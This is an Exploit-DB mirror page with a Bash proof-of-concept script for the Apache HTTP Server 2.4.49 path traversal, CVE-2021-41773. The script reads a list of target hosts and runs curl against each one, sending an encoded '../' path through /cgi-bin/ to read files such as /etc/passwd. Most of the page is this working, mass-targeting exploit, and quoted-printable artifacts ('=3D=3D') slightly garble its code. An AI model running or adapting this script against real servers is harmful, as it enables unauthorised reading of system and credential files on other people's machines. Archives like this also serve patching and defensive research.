exploit-db-mirror/exploits/multiple/webapps/50383.sh
Offensive Security bd08b79b4a DB: 2021-10-07
4 changes to exploits/shellcodes

Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
Apache HTTP Server 2.4.49 - Path Traversal
2021-10-07 05:02:12 +00:00

18 lines
No EOL
575 B
Bash
Executable file

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team
#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done